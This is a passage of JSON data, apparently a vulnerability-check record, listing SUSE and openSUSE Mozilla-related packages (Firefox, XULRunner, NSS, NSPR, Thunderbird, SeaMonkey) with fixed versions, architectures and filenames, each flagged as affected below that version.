"packageFilename": "MozillaFirefox-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-venkman-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ppc", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.ppc.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-irc-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.15-0.1.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "python-xpcom191-1.9.1.15-0.1.1.ppc.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-x86-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.0.1-6.5.1", "arch": "ppc", "packageFilename": "enigmail-1.0.1-6.5.1.ppc.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ia64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.ia64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-js192-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-js192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.ppc.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nspr-64bit-4.8.6-1.1.1.ppc.rpm", "packageName": "mozilla-nspr-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.0.1-3.3.1", "arch": "i586", "packageFilename": "enigmail-1.0.1-3.3.1.i586.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ppc", "packageFilename": "mozilla-nspr-64bit-4.8.6-1.6.1.ppc.rpm", "packageName": "mozilla-nspr-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.ppc.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-venkman-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libsoftokn3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.6.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "s390x", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.s390x.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": 